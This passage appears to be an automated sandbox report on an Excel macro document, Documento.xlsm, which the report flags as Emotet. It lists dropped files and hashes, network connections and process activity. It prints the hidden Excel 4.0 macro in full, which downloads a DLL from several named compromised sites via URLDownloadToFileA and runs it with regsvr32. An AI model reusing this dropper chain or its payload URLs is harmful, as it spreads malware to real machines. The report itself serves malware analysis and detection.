                                                                                                              Process:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                              File Type:Microsoft Cabinet archive data, 61414 bytes, 1 file
                                                                                                              Category:dropped
                                                                                                              Size (bytes):61414
                                                                                                              Entropy (8bit):7.995245868798237
                                                                                                              Encrypted:true
                                                                                                              SSDEEP:1536:EysgU6qmzixT64jYMZ8HbVPGfVDwm/xLZ9rP:wF6qmeo4eH1m9wmLvrP
                                                                                                              MD5:ACAEDA60C79C6BCAC925EEB3653F45E0
                                                                                                              SHA1:2AAAE490BCDACCC6172240FF1697753B37AC5578
                                                                                                              SHA-256:6B0CECCF0103AFD89844761417C1D23ACC41F8AEBF3B7230765209B61EEE5658
                                                                                                              SHA-512:FEAA6E7ED7DDA1583739B3E531AB5C562A222EE6ECD042690AE7DCFF966717C6E968469A7797265A11F6E899479AE0F3031E8CF5BEBE1492D5205E9C59690900
                                                                                                              Malicious:false
                                                                                                              Preview:MSCF............,...................I.......;w........RSNj .authroot.stl..>.(.5..CK..8T....c_.d...A.K...+.d.H..*i.RJJ.IQIR..$t)Kd.-[..T\{..ne......<.w......A..B........c...wi......D....c.0D,L........fy....Rg...=........i,3.3..Z....~^ve<...TF.*...f.zy.,...m.@.0.0...m.3..I(..+..v#...(.2....e...L..*y..V.......~U...."<ke.....l.X:Dt..R<7.5\A7L0=..T.V...IDr..8<....r&...I-.^..b.b.".Af....E.._..r.>.`;,.Hob..S.....7'..\.R$.".g..+..64..@nP.....k3...B.`.G..@D.....L.....`^...#OpW.....!....`.....rf:.}.R.@....gR.#7....l..H.#...d.Qh..3..fCX....==#..M.l..~&....[.J9.\..Ww.....Tx.%....]..a4E...q.+...#.*a..x..O..V.t..Y1!.T..`U...-...< _@...|(.....0..3.`.LU...E0.Gu.4KN....5...?.....I.p..'..........N<.d.O..dH@c1t...[w/...T....cYK.X>.0..Z.....O>..9.3.#9X.%.b...5.YK.E.V.....`./.3.._..nN]..=..M.o.F.._..z....._...gY..!Z..?l....vp.l.:.d.Z..W.....~...N.._.k...&.....$......i.F.d.....D!e.....Y..,.E..m.;.1... $.F..O.F.o_}.uG....,.%.>,.Zx.......o....c../.;....g&.....

                                                                                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                              Download File
                                                                                                              Process:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):328
                                                                                                              Entropy (8bit):3.1244568012511515
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6:kKul7k8SN+SkQlPlEGYRMY9z+4KlDA3RUeYlUmlUR/t:y79kPlE99SNxAhUeYlUSA/t
                                                                                                              MD5:671B807D13FE23FEE6DF64B38528BB0C
                                                                                                              SHA1:592E27305221E4E6BFBBA9DCE9C83BDC5B368065
                                                                                                              SHA-256:0674E472EFA7A3E2F7B818119807CE4B177B11016E145022D0741005D8814B24
                                                                                                              SHA-512:DEBD23519ED0683349E5D939E62B9913D76F3F68B14BA314D2E350261F07140FDDBD5FA1BF283E40D9C993415EE62609149DEBA0DF4203B98B02A1F654998814
                                                                                                              Malicious:false
                                                                                                              Preview:p...... ..........D..)..(....................................................... ........q.\].......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.7.1.e.1.5.c.5.d.c.4.d.7.1.:.0."...

                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\BRqk58WkNweubruYwrLOt[1].dll

                                                                                                              Download File
                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):679936
                                                                                                              Entropy (8bit):6.910563837671393
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12288:Z6ZLutvgrwV8RQc5W1yS0ezL9J6XKTe/vyzfANcN/kJhXx5y:qza8RQc5W1P0Q9sXKTLzflBkn
                                                                                                              MD5:9B303820618ADC4A4828E9E689F73562
                                                                                                              SHA1:64F1453A3E556F6625251D4460EC035257A4E25F
                                                                                                              SHA-256:AB3BC9CFB110ECD8DA508576F02C22947A008FBB28CE1C4C46741044BF359C8B
                                                                                                              SHA-512:35612714A9C29879848E7C6F2D82713EB1F68BE5D7A22449E1560E95A6E002A600873D8C867E6A617F9D40E427273458E2948EAFE8B59C2D1C2E51A572EAE15A
                                                                                                              Malicious:true
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........M..ZM..ZM..Z...ZH..Z.%.ZL..Z..ZG..Z..ZT..ZM..Z...Zj'.ZQ..Zj'.Z...Zj'.Z...Zj'.ZL..Zj'.ZL..Zj'.ZL..ZRichM..Z........................PE..L......b...........!.....P...................`......................................e...................................r............0..P.......................pq...................................................`..........@....................text....C.......P.................. ..`.rdata...V...`...`...`..............@..@.data... l.......0..................@....rsrc...P....0......................@..@.reloc.............................@..B................................................................................................................................................................................................................................................................................................

                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3429A7BE.jpeg

                                                                                                              Download File
                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 220x220, segment length 16, baseline, precision 8, 2418x1051, frames 3
                                                                                                              Category:dropped
                                                                                                              Size (bytes):197770
                                                                                                              Entropy (8bit):7.489581655824389
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6144:TysPlevgOrNeduXWNOYYYYYYYYYYYYYYYYYYYYYY+:TrPU4xduGB
                                                                                                              MD5:87E4C080D9EBE408EF871B68B9C9AA61
                                                                                                              SHA1:C2C39756608C8452892C1911C95313B944CE7231
                                                                                                              SHA-256:C8BE21BAC10998180168DEE76FF5095D723E6CC0D09AE69161926E3CBAB36441
                                                                                                              SHA-512:05AA79FC0272B38C977671900031AAB19476EF900209766F0DB2918C391B7607E14A66D677386AC1CC6D13F0FC3852C39C1A7DB3CDD6E10F0CB4C3B364C288D5
                                                                                                              Malicious:false
                                                                                                              Preview:......JFIF.............C....................................................................C.........................................................................r.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....I.>..Q...I..._.cF.ns.?.+...S......._.]d..{C......^S_..7.g9VwW.A.<..S.1o.g.g....o..^.3.Bn.N~kM...U.._3.?.<...@.[..E.......)......../...N.... q.x...(...........1..........N...~".........G..uo......^'E...8........|=...u?.c..#.?.<...@.[..E.......)......../...N.?. q.x...(?...{..>.....G...Jx#..:..........S......._.]x....@......P......}.......l.....G..uo......G.4..?.

                                                                                                              C:\Users\user\AppData\Local\Temp\8833.tmp

                                                                                                              Download File
                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1536
                                                                                                              Entropy (8bit):1.1464700112623651
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
                                                                                                              MD5:72F5C05B7EA8DD6059BF59F50B22DF33
                                                                                                              SHA1:D5AF52E129E15E3A34772806F6C5FBF132E7408E
                                                                                                              SHA-256:1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
                                                                                                              SHA-512:6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E
                                                                                                              Malicious:false
                                                                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                              C:\Users\user\AppData\Local\Temp\Cab38BB.tmp

                                                                                                              Download File
                                                                                                              Process:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                              File Type:Microsoft Cabinet archive data, 61414 bytes, 1 file
                                                                                                              Category:dropped
                                                                                                              Size (bytes):61414
                                                                                                              Entropy (8bit):7.995245868798237
                                                                                                              Encrypted:true
                                                                                                              SSDEEP:1536:EysgU6qmzixT64jYMZ8HbVPGfVDwm/xLZ9rP:wF6qmeo4eH1m9wmLvrP
                                                                                                              MD5:ACAEDA60C79C6BCAC925EEB3653F45E0
                                                                                                              SHA1:2AAAE490BCDACCC6172240FF1697753B37AC5578
                                                                                                              SHA-256:6B0CECCF0103AFD89844761417C1D23ACC41F8AEBF3B7230765209B61EEE5658
                                                                                                              SHA-512:FEAA6E7ED7DDA1583739B3E531AB5C562A222EE6ECD042690AE7DCFF966717C6E968469A7797265A11F6E899479AE0F3031E8CF5BEBE1492D5205E9C59690900
                                                                                                              Malicious:false
                                                                                                              Preview:MSCF............,...................I.......;w........RSNj .authroot.stl..>.(.5..CK..8T....c_.d...A.K...+.d.H..*i.RJJ.IQIR..$t)Kd.-[..T\{..ne......<.w......A..B........c...wi......D....c.0D,L........fy....Rg...=........i,3.3..Z....~^ve<...TF.*...f.zy.,...m.@.0.0...m.3..I(..+..v#...(.2....e...L..*y..V.......~U...."<ke.....l.X:Dt..R<7.5\A7L0=..T.V...IDr..8<....r&...I-.^..b.b.".Af....E.._..r.>.`;,.Hob..S.....7'..\.R$.".g..+..64..@nP.....k3...B.`.G..@D.....L.....`^...#OpW.....!....`.....rf:.}.R.@....gR.#7....l..H.#...d.Qh..3..fCX....==#..M.l..~&....[.J9.\..Ww.....Tx.%....]..a4E...q.+...#.*a..x..O..V.t..Y1!.T..`U...-...< _@...|(.....0..3.`.LU...E0.Gu.4KN....5...?.....I.p..'..........N<.d.O..dH@c1t...[w/...T....cYK.X>.0..Z.....O>..9.3.#9X.%.b...5.YK.E.V.....`./.3.._..nN]..=..M.o.F.._..z....._...gY..!Z..?l....vp.l.:.d.Z..W.....~...N.._.k...&.....$......i.F.d.....D!e.....Y..,.E..m.;.1... $.F..O.F.o_}.uG....,.%.>,.Zx.......o....c../.;....g&.....

                                                                                                              C:\Users\user\AppData\Local\Temp\Tar38BC.tmp

                                                                                                              Download File
                                                                                                              Process:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                              File Type:data
                                                                                                              Category:modified
                                                                                                              Size (bytes):161595
                                                                                                              Entropy (8bit):6.302448239972517
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:1536:FlYXleUpAR73k/99oFr+yQNujWNWv+1w/A/rHeGyjYPjCQarsmt6Q/GM:F+X7ARcqhQNujZv+mQjCjrsSP
                                                                                                              MD5:D99661D0893A52A0700B8AE68457351A
                                                                                                              SHA1:01491FD23C4813A602D48988531EA4ABBCDF7ED9
                                                                                                              SHA-256:BDD5111162A6FA25682E18FA74E37E676D49CAFCB5B7207E98E5256D1EF0D003
                                                                                                              SHA-512:6F2291CA958CBF5423CBBE570FD871C4D379A435BE692908CAAACF4C2A68BD81008254802D4F4B212165E93B126ED871A62EAF3067909EB855B29573FC325B8E
                                                                                                              Malicious:false
                                                                                                              Preview:0..w6..*.H.........w&0..w!...1.0...`.H.e......0..g5..+.....7.....g%0..g 0...+.....7.........\.H....211018201437Z0...+......0..f.0..D.....`...@.,..0..0.r1..*0...+.....7..h1......+h...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o

                                                                                                              C:\Users\user\AppData\Local\Temp\~DF214DADA29E525B4F.TMP

                                                                                                              Download File
                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):512
                                                                                                              Entropy (8bit):0.0
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3::
                                                                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                              Malicious:false
                                                                                                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                              C:\Users\user\Desktop\~$Documento.xlsm

                                                                                                              Download File
                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):165
                                                                                                              Entropy (8bit):1.4377382811115937
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                                                                                              MD5:797869BB881CFBCDAC2064F92B26E46F
                                                                                                              SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                                                                                              SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                                                                                              SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                                                                                              Malicious:true
                                                                                                              Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                              C:\Users\user\xxw1.ocx

                                                                                                              Download File
                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):679936
                                                                                                              Entropy (8bit):6.910563837671393
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12288:Z6ZLutvgrwV8RQc5W1yS0ezL9J6XKTe/vyzfANcN/kJhXx5y:qza8RQc5W1P0Q9sXKTLzflBkn
                                                                                                              MD5:9B303820618ADC4A4828E9E689F73562
                                                                                                              SHA1:64F1453A3E556F6625251D4460EC035257A4E25F
                                                                                                              SHA-256:AB3BC9CFB110ECD8DA508576F02C22947A008FBB28CE1C4C46741044BF359C8B
                                                                                                              SHA-512:35612714A9C29879848E7C6F2D82713EB1F68BE5D7A22449E1560E95A6E002A600873D8C867E6A617F9D40E427273458E2948EAFE8B59C2D1C2E51A572EAE15A
                                                                                                              Malicious:true
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........M..ZM..ZM..Z...ZH..Z.%.ZL..Z..ZG..Z..ZT..ZM..Z...Zj'.ZQ..Zj'.Z...Zj'.Z...Zj'.ZL..Zj'.ZL..Zj'.ZL..ZRichM..Z........................PE..L......b...........!.....P...................`......................................e...................................r............0..P.......................pq...................................................`..........@....................text....C.......P.................. ..`.rdata...V...`...`...`..............@..@.data... l.......0..................@....rsrc...P....0......................@..@.reloc.............................@..B................................................................................................................................................................................................................................................................................................

                                                                                                              C:\Windows\SysWOW64\Lublsqnpkfxznyn\qzdpzpnlmhwmidn.sqj (copy)

                                                                                                              Download File
                                                                                                              Process:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):679936
                                                                                                              Entropy (8bit):6.910563837671393
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12288:Z6ZLutvgrwV8RQc5W1yS0ezL9J6XKTe/vyzfANcN/kJhXx5y:qza8RQc5W1P0Q9sXKTLzflBkn
                                                                                                              MD5:9B303820618ADC4A4828E9E689F73562
                                                                                                              SHA1:64F1453A3E556F6625251D4460EC035257A4E25F
                                                                                                              SHA-256:AB3BC9CFB110ECD8DA508576F02C22947A008FBB28CE1C4C46741044BF359C8B
                                                                                                              SHA-512:35612714A9C29879848E7C6F2D82713EB1F68BE5D7A22449E1560E95A6E002A600873D8C867E6A617F9D40E427273458E2948EAFE8B59C2D1C2E51A572EAE15A
                                                                                                              Malicious:false
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........M..ZM..ZM..Z...ZH..Z.%.ZL..Z..ZG..Z..ZT..ZM..Z...Zj'.ZQ..Zj'.Z...Zj'.Z...Zj'.ZL..Zj'.ZL..Zj'.ZL..ZRichM..Z........................PE..L......b...........!.....P...................`......................................e...................................r............0..P.......................pq...................................................`..........@....................text....C.......P.................. ..`.rdata...V...`...`...`..............@..@.data... l.......0..................@....rsrc...P....0......................@..@.reloc.............................@..B................................................................................................................................................................................................................................................................................................

                                                                                                              Static File Info

                                                                                                              General

                                                                                                              File type:Microsoft Excel 2007+
                                                                                                              Entropy (8bit):7.50230113901236
                                                                                                              TrID:
                                                                                                              • Excel Microsoft Office Open XML Format document with Macro (51004/1) 51.52%
                                                                                                              • Excel Microsoft Office Open XML Format document (40004/1) 40.40%
                                                                                                              • ZIP compressed archive (8000/1) 8.08%
                                                                                                              File name:Documento.xlsm
                                                                                                              File size:214313
                                                                                                              MD5:5acc6f1ff8366ddc895392da4e6a50e3
                                                                                                              SHA1:45b3ef65a4dabdbbefec603fe3dca9bfb1c5c643
                                                                                                              SHA256:0bb184f9c3e9cda4571bd806b90dbda484c331d9dce7af784405fd211f6c71c4
                                                                                                              SHA512:dc1921d8e4c2a2496d1d44f4079e1518015aec4854eed6f7759136bc42b21e39305efc5285a9dd1ab846a73a6dbd04faa60489d0bfc38e00f416fd0ff443dc70
                                                                                                              SSDEEP:6144:CMyysPlevgOrNeduXWNOYYYYYYYYYYYYYYYYYYYYYY1:RyrPU4xduGO
                                                                                                              File Content Preview:PK..........!.G4..............[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                              File Icon

                                                                                                              Icon Hash:e4e2aa8aa4bcbcac

                                                                                                              Static OLE Info

                                                                                                              General

                                                                                                              Document Type:OpenXML
                                                                                                              Number of OLE Files:1

                                                                                                              OLE File "Documento.xlsm"

                                                                                                              Indicators
                                                                                                              Has Summary Info:
                                                                                                              Application Name:
                                                                                                              Encrypted Document:
                                                                                                              Contains Word Document Stream:
                                                                                                              Contains Workbook/Book Stream:
                                                                                                              Contains PowerPoint Document Stream:
                                                                                                              Contains Visio Document Stream:
                                                                                                              Contains ObjectPool Stream:
                                                                                                              Flash Objects Count:
                                                                                                              Contains VBA Macros:

                                                                                                              Macro 4.0 Code

                                                                                                              Name:Br1
                                                                                                              Type:3
                                                                                                              Final:False
                                                                                                              Visible:False
                                                                                                              Protected:False
                                                                                                              Br13False0Falsepre14,2,=CHAR("101")
                                                                                                              Name:Br2
                                                                                                              Type:3
                                                                                                              Final:False
                                                                                                              Visible:False
                                                                                                              Protected:False
                                                                                                              Br23False0Falsepre2,1,e
                                                                                                              Name:Br2
                                                                                                              Type:3
                                                                                                              Final:False
                                                                                                              Visible:False
                                                                                                              Protected:False
                                                                                                              Br23False0Falsepost2,1,e
                                                                                                              Name:EFWFSFG
                                                                                                              Type:4
                                                                                                              Final:False
                                                                                                              Visible:False
                                                                                                              Protected:False
                                                                                                              EFWFSFG4False0Falsepost10,3,=FORMULA("e";"e")=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.swaong.com/assets/VV4/","..\xxw1.ocx",0,0)";D15)=FORMULA("=IF(DDWD<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://vulkanvegasbonus.jeunete.com/wp-content/7uAnLq8I/","..\xxw1.ocx",0,0))";D17)=FORMULA("=IF(DDWD1<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://old.liceum9.ru/images/images/NKeRl/","..\xxw1.ocx",0,0))";D19)=FORMULA("=IF(DDWD2<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://arttop100.cn/wp-admin/DvyJPADMPW/","..\xxw1.ocx",0,0))";D21)=FORMULA("=IF(DDWD3<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,,0,"2&"..\xxw1.ocx",0,0))";D23)=FORMULA("=IF(DDWD4<0, CLOSE(0),)";D25)=FORMULA("=EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\xxw1.ocx")";D27)=FORMULA("=RETURN()";D36)14,3,=CALL("urlmon";"URLDownloadToFileA";"JJCCBB";0;"https://www.swaong.com/assets/VV4/";"..\xxw1.ocx";0;0)16,3,=IF(DDWD<0; CALL("urlmon";"URLDownloadToFileA";"JJCCBB";0;"http://vulkanvegasbonus.jeunete.com/wp-content/7uAnLq8I/";"..\xxw1.ocx";0;0))18,3,=IF(DDWD1<0; CALL("urlmon";"URLDownloadToFileA";"JJCCBB";0;"http://old.liceum9.ru/images/images/NKeRl/";"..\xxw1.ocx";0;0))20,3,=IF(DDWD2<0; CALL("urlmon";"URLDownloadToFileA";"JJCCBB";0;"http://arttop100.cn/wp-admin/DvyJPADMPW/";"..\xxw1.ocx";0;0))22,3,=IF(DDWD3<0; CALL("urlmon";"URLDownloadToFileA";"JJCCBB";0;"http://peterjacksoncars.com.au/wp-content/sJ/";"..\xxw1.ocx";0;0))24,3,=IF(DDWD4<0; CLOSE(0);)26,3,=EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\xxw1.ocx")35,3,=RETURN()
                                                                                                              Name:EFWFSFG
                                                                                                              Type:4
                                                                                                              Final:False
                                                                                                              Visible:False
                                                                                                              Protected:False
                                                                                                              EFWFSFG4False0Falsepre10,3,=FORMULA("e";"e")=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.swaong.com/assets/VV4/","..\xxw1.ocx",0,0)";D15)=FORMULA("=IF(DDWD<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://vulkanvegasbonus.jeunete.com/wp-content/7uAnLq8I/","..\xxw1.ocx",0,0))";D17)=FORMULA("=IF(DDWD1<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://old.liceum9.ru/images/images/NKeRl/","..\xxw1.ocx",0,0))";D19)=FORMULA("=IF(DDWD2<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://arttop100.cn/wp-admin/DvyJPADMPW/","..\xxw1.ocx",0,0))";D21)=FORMULA("=IF(DDWD3<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,,0,"2&"..\xxw1.ocx",0,0))";D23)=FORMULA("=IF(DDWD4<0, CLOSE(0),)";D25)=FORMULA("=EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\xxw1.ocx")";D27)=FORMULA("=RETURN()";D36)
                                                                                                              Name:Br1
                                                                                                              Type:3
                                                                                                              Final:False
                                                                                                              Visible:False
                                                                                                              Protected:False
                                                                                                              Br13False0Falsepost14,2,=CHAR("101")

                                                                                                              Network Behavior

                                                                                                              Network Port Distribution

                                                                                                              TCP Packets

                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Feb 24, 2022 13:54:42.410712957 CET491688080192.168.2.22135.148.121.246
                                                                                                              Feb 24, 2022 13:54:42.513951063 CET808049168135.148.121.246192.168.2.22
                                                                                                              Feb 24, 2022 13:54:42.514071941 CET491688080192.168.2.22135.148.121.246
                                                                                                              Feb 24, 2022 13:54:42.617535114 CET491688080192.168.2.22135.148.121.246
                                                                                                              Feb 24, 2022 13:54:42.722239971 CET808049168135.148.121.246192.168.2.22
                                                                                                              Feb 24, 2022 13:54:42.754889011 CET808049168135.148.121.246192.168.2.22
                                                                                                              Feb 24, 2022 13:54:42.754951954 CET808049168135.148.121.246192.168.2.22
                                                                                                              Feb 24, 2022 13:54:42.755040884 CET491688080192.168.2.22135.148.121.246
                                                                                                              Feb 24, 2022 13:54:42.758781910 CET491688080192.168.2.22135.148.121.246
                                                                                                              Feb 24, 2022 13:54:42.775898933 CET491688080192.168.2.22135.148.121.246
                                                                                                              Feb 24, 2022 13:54:42.891010046 CET808049168135.148.121.246192.168.2.22
                                                                                                              Feb 24, 2022 13:54:42.891130924 CET491688080192.168.2.22135.148.121.246
                                                                                                              Feb 24, 2022 13:54:46.432123899 CET491688080192.168.2.22135.148.121.246
                                                                                                              Feb 24, 2022 13:54:46.575891018 CET808049168135.148.121.246192.168.2.22
                                                                                                              Feb 24, 2022 13:54:46.977751017 CET808049168135.148.121.246192.168.2.22
                                                                                                              Feb 24, 2022 13:54:46.977863073 CET491688080192.168.2.22135.148.121.246
                                                                                                              Feb 24, 2022 13:54:49.976819038 CET808049168135.148.121.246192.168.2.22
                                                                                                              Feb 24, 2022 13:54:49.976846933 CET808049168135.148.121.246192.168.2.22
                                                                                                              Feb 24, 2022 13:54:49.976926088 CET491688080192.168.2.22135.148.121.246
                                                                                                              Feb 24, 2022 13:54:49.976963043 CET491688080192.168.2.22135.148.121.246

                                                                                                              UDP Packets

                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Feb 24, 2022 13:54:08.191229105 CET5216753192.168.2.228.8.8.8

                                                                                                              DNS Queries

                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                              Feb 24, 2022 13:54:08.191229105 CET192.168.2.228.8.8.80xaa77Standard query (0)www.swaong.comA (IP address)IN (0x0001)

                                                                                                              DNS Answers

                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                              Feb 24, 2022 13:54:08.260437012 CET8.8.8.8192.168.2.220xaa77No error (0)www.swaong.comswaong-home.azurewebsites.netCNAME (Canonical name)IN (0x0001)
                                                                                                              Feb 24, 2022 13:54:08.260437012 CET8.8.8.8192.168.2.220xaa77No error (0)swaong-home.azurewebsites.netwaws-prod-dm1-143.sip.azurewebsites.windows.netCNAME (Canonical name)IN (0x0001)
                                                                                                              Feb 24, 2022 13:54:08.260437012 CET8.8.8.8192.168.2.220xaa77No error (0)waws-prod-dm1-143.sip.azurewebsites.windows.netwaws-prod-dm1-143.cloudapp.netCNAME (Canonical name)IN (0x0001)

                                                                                                              Statistics

                                                                                                              CPU Usage

                                                                                                              Click to jump to process

                                                                                                              Memory Usage

                                                                                                              Click to jump to process

                                                                                                              High Level Behavior Distribution

                                                                                                              Click to dive into process behavior distribution

                                                                                                              Behavior

                                                                                                              Click to jump to process

                                                                                                              System Behavior

                                                                                                              General

                                                                                                              Target ID:0
                                                                                                              Start time:13:53:18
                                                                                                              Start date:24/02/2022
                                                                                                              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                                                              Imagebase:0x13f170000
                                                                                                              File size:28253536 bytes
                                                                                                              MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high

                                                                                                              General

                                                                                                              Target ID:3
                                                                                                              Start time:13:53:29
                                                                                                              Start date:24/02/2022
                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\SysWow64\regsvr32.exe /s ..\xxw1.ocx
                                                                                                              Imagebase:0xfc0000
                                                                                                              File size:14848 bytes
                                                                                                              MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.435154889.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:high

                                                                                                              General

                                                                                                              Target ID:4
                                                                                                              Start time:13:53:31
                                                                                                              Start date:24/02/2022
                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Lublsqnpkfxznyn\qzdpzpnlmhwmidn.sqj"
                                                                                                              Imagebase:0xfc0000
